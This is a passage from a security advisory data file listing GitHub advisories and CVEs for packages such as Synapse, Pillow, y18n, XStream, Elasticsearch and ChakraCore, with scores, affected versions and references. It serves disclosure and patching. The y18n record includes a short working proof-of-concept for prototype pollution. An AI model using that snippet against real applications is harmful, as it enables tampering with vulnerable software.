+A malicious homeserver could redirect requests to their .well-known file to a large file. This can lead to a denial of service attack where homeservers will consume significantly more resources when requesting the .well-known file of a malicious homeserver.
+
+This affects any server which accepts federation requests from untrusted servers.
+
+### Patches
+Issue is resolved by #8950. A bug not affecting the security aspects of this was fixed in #9108.
+
+### Workarounds
+The `federation_domain_whitelist` setting can be used to restrict the homeservers communicated with over federation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.99.0'}, {'fixed': '1.25.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-2hwx-mjrm-v3g8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21274'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/8950'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/commit/ff5c4da1289cb5e097902b3e55b771be342c29d6'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.25.0'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-01T19:03:06Z', 'nvd_published_at': '2021-02-26T18:15:00Z'}"
+1.4.0,GHSA-p43w-g3c5-g5mq,2021-12-02T15:31:00Z,2021-03-29T16:35:27Z,,['CVE-2021-25293'],Out of bounds read in Pillow,An issue was discovered in Pillow before 8.1.1. There is an out-of-bounds read in SGIRleDecode.c.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25293'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/4853e522bddbec66022c0915b9a56255d0188bf9'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:07:38Z', 'nvd_published_at': '2021-03-19T04:15:00Z'}"
+1.4.0,GHSA-mvg9-xffr-p774,2023-09-04T16:29:59Z,2021-03-29T16:35:57Z,,['CVE-2021-25291'],Out of bounds read in Pillow,"An issue was discovered in Pillow before 8.2.0. In `TiffDecode.c`, there is an out-of-bounds read in `TiffreadRGBATile` via invalid tile boundaries.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25291'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/cbdce6c5d054fccaf4af34b47f212355c64ace7a'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:05:25Z', 'nvd_published_at': '2021-03-19T04:15:00Z'}"
+1.4.0,GHSA-c4w7-xm78-47vh,2023-09-07T20:22:08Z,2021-03-29T16:05:12Z,,['CVE-2020-7774'],Prototype Pollution in y18n,"### Overview
+
+The npm package `y18n` before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.
+
+### POC
+
+```js
+const y18n = require('y18n')();
+
+y18n.setLocale('__proto__');
+y18n.updateLocale({polluted: true});
+
+console.log(polluted); // true
+```
+
+### Recommendation
+
+Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'y18n'}, 'ecosystem_specific': {'affected_functions': ['y18n']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'y18n'}, 'ecosystem_specific': {'affected_functions': ['y18n']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.1'}]}], 'versions': ['4.0.0']}, {'package': {'ecosystem': 'npm', 'name': 'y18n'}, 'ecosystem_specific': {'affected_functions': ['y18n']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7774'}, {'type': 'WEB', 'url': 'https://github.com/yargs/y18n/issues/96'}, {'type': 'WEB', 'url': 'https://github.com/yargs/y18n/pull/108'}, {'type': 'WEB', 'url': 'https://github.com/yargs/y18n/commit/90401eea9062ad498f4f792e3fff8008c4c193a3'}, {'type': 'WEB', 'url': 'https://github.com/yargs/y18n/commit/a9ac604abf756dec9687be3843e2c93bfe581f25'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/yargs/y18n'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-Y18N-1021887'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}]","{'cwe_ids': ['CWE-1321', 'CWE-20', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T21:23:11Z', 'nvd_published_at': '2020-11-17T13:15:00Z'}"
+1.4.0,GHSA-hrcp-8f3q-4w2c,2022-02-08T21:32:01Z,2021-03-22T23:29:37Z,,['CVE-2021-21351'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact
+The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16.
+
+### Workarounds
+See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21351](https://x-stream.github.io/CVE-2021-21351.html).
+
+### Credits
+wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-hrcp-8f3q-4w2c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21351'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21351.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-434', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:27:18Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}"
+1.4.0,GHSA-5fvx-2jj3-6mff,2021-03-16T01:19:41Z,2021-03-18T19:27:27Z,,['CVE-2021-22132'],Insufficiently Protected Credentials in Elasticsearch,Elasticsearch versions 7.7.0 to 7.10.1 contain an information disclosure flaw in the async search API. Users who execute an async search will improperly store the HTTP headers. An Elasticsearch user with the ability to read the .tasks index could obtain sensitive request headers of other users in the cluster. This issue is fixed in Elasticsearch 7.10.2,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.7.0'}, {'fixed': '7.10.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22132'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elasticsearch-7-10-2-security-update/261164'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210219-0004/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-522'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T01:19:41Z', 'nvd_published_at': '2021-01-14T20:15:00Z'}"
+1.4.0,GHSA-x7hc-x7fm-f7qh,2021-03-23T01:42:20Z,2021-03-23T01:54:17Z,,['CVE-2021-21370'],Cross-Site Scripting in Content Preview (CType menu),"> ### Meta
+> * CVSS: `AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (4.1)
+> * CWE-79
+> * Status: **DRAFT**
+
+### Problem
+It has been discovered that content elements of type _menu_ are vulnerable to cross-site scripting when their referenced items get previewed in the page module. A valid backend user account is needed to exploit this vulnerability.
+
+### Solution
+Update to TYPO3 versions 7.6.51, 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described.
+
+### Credits
+Thanks to TYPO3 contributor Oliver Bartsch who reported and fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2021-008](https://typo3.org/security/advisory/typo3-core-sa-2021-008)",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.6.51'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.6.50'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.40'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.7.39'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.5.24'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.13'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-x7hc-x7fm-f7qh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21370'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/typo3/cms-backend'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-008'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T01:42:20Z', 'nvd_published_at': '2021-03-23T02:15:00Z'}"
+1.4.0,GHSA-9735-p6r2-2hgh,2021-03-18T21:25:17Z,2021-03-29T21:00:00Z,,['CVE-2019-0911'],Out-of-bounds write,"A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0884, CVE-2019-0918.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0911'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/a2deba5e1850782014a2a34678464b251e448337'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0911'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:25:17Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-gmrf-99gw-vvwj,2021-03-11T17:41:49Z,2021-03-11T17:42:08Z,,[],/user/sessions endpoint allows detecting valid accounts,"This Security Advisory is about a vulnerability in eZ Platform v1.13, v2.5, and v3.2, and in Ibexa DXP and Ibexa Open Source v3.3. The /user/sessions endpoint can let an attacker detect if a given username or email refers to a valid account. This can be detected through differences in the response data or response time of certain requests. The fix ensures neither attack is possible. The fix is distributed via Composer.
+
+If you come across a security issue in our products, here is how you can report it to us: https://doc.ibexa.co/en/latest/guide/reporting_issues/#toc",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.13.0'}, {'fixed': '6.13.8.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.13.8.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.5.0'}, {'fixed': '7.5.15.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.5.15.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-gmrf-99gw-vvwj'}, {'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/commit/b496f073c3f03707d3531a6941dc098b84e3cbed'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/ezsystems/ezpublish-kernel'}]","{'cwe_ids': ['CWE-203'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-11T17:41:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6973-94v8-5mgw,2021-03-19T20:42:16Z,2021-03-29T20:57:42Z,,['CVE-2019-0991'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0989, CVE-2019-0992, CVE-2019-0993, CVE-2019-1002, CVE-2019-1003, CVE-2019-1024, CVE-2019-1051, CVE-2019-1052.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0991'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/1caa4118796d33513bc40ce894c053a92de98abb'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/3d6226cc2d1077537220361c82e34a362c6c76ee'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0991'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T20:42:16Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}"
+1.4.0,GHSA-g9fw-9x87-rmrj,2022-06-06T17:56:25Z,2021-03-18T19:27:13Z,,['CVE-2020-7020'],Privilege Context Switching Error in Elasticsearch,Elasticsearch versions before 6.8.13 and 7.9.2 contain a document disclosure flaw when Document or Field Level Security is used. Search queries do not properly preserve security permissions when executing certain complex queries. This could result in the search disclosing the existence of documents the attacker should not be able to view. This could result in an attacker gaining additional insight into potentially sensitive indices.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.8.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.9.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7020'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elastic-stack-7-9-3-and-6-8-13-security-update/253033'}, {'type': 'PACKAGE', 'url': 'https://github.com/elastic/elasticsearch'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20201123-0001/'}, {'type': 'WEB', 'url': 'https://staging-website.elastic.co/community/security/'}]","{'cwe_ids': ['CWE-269', 'CWE-270'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T16:31:38Z', 'nvd_published_at': '2020-10-22T17:15:00Z'}"
+1.4.0,GHSA-93wh-35r4-6qmw,2022-08-11T16:37:15Z,2021-03-29T20:43:23Z,,['CVE-2021-20281'],Moodle allowed some users without permission to view other users' full names,"It was possible for some users without permission to view other users' full names to do so via the online users block in moodle before 3.10.2, 3.9.5, 3.8.8, 3.5.17.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0'}, {'fixed': '3.10.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5'}, {'fixed': '3.5.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20281'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/33d6017287e1835513a3de8edd3fbf7a6a90af9c'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1939041'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AFSNJ7XHVTC52RSRX2GBQFF3VEEAY2MS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFH5DDMU5TZ3JT4Q52WMRAHACA5MHIMT/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=419652'}]","{'cwe_ids': ['CWE-200', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:14:27Z', 'nvd_published_at': '2021-03-15T22:15:00Z'}"
+1.4.0,GHSA-w32p-76xr-88pc,2021-03-18T22:20:51Z,2021-03-29T20:59:06Z,,['CVE-2019-1003'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0989, CVE-2019-0991, CVE-2019-0992, CVE-2019-0993, CVE-2019-1002, CVE-2019-1024, CVE-2019-1051, CVE-2019-1052.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1003'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/3d6226cc2d1077537220361c82e34a362c6c76ee'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/90f67afac6362828c750f3bccbcc1c360caf29e4'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1003'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:20:51Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}"
+1.4.0,GHSA-7423-5qfm-g648,2021-03-18T21:51:29Z,2021-03-29T21:00:09Z,,['CVE-2019-0916'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0916'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d85b5025b047f10784c53c6c1dd771775d417f5f'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0916'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:51:29Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-gfp2-w5jm-955q,2021-03-29T17:30:03Z,2021-03-23T15:26:34Z,,['CVE-2021-21376'],OMERO.web exposes some unnecessary session information in the page,"### Background
+OMERO.web loads various information about the current user such as their id, name and the groups they are in, and these are available on the main webclient pages. Some additional information being loaded is not used by the webclient and is being removed in this release.
+
+### Impact
+OMERO.web before 5.9.0
+
+### Patches
+5.9.0
+
+### Workarounds
+No workaround
+
+### References
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [omero-web](https://github.com/ome/omero-web)
+* Email us at [security](mailto:security@openmicroscopy.org.uk)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'omero-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ome/omero-web/security/advisories/GHSA-gfp2-w5jm-955q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21376'}, {'type': 'WEB', 'url': 'https://github.com/ome/omero-web/commit/952f8e5d28532fbb14fb665982211329d137908c'}, {'type': 'WEB', 'url': 'https://github.com/ome/omero-web/blob/master/CHANGELOG.md#590-march-2021'}, {'type': 'WEB', 'url': 'https://pypi.org/project/omero-web/'}, {'type': 'WEB', 'url': 'https://www.openmicroscopy.org/security/advisories/2021-SV1/'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:25:08Z', 'nvd_published_at': '2021-03-23T16:15:00Z'}"
+1.4.0,GHSA-59jw-jqf4-3wq3,2022-02-08T21:33:08Z,2021-03-22T23:28:23Z,,['CVE-2021-21344'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact
+The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16.
+
+### Workarounds
+See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21344](https://x-stream.github.io/CVE-2021-21344.html).
+
+### Credits
+钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-59jw-jqf4-3wq3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21344'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 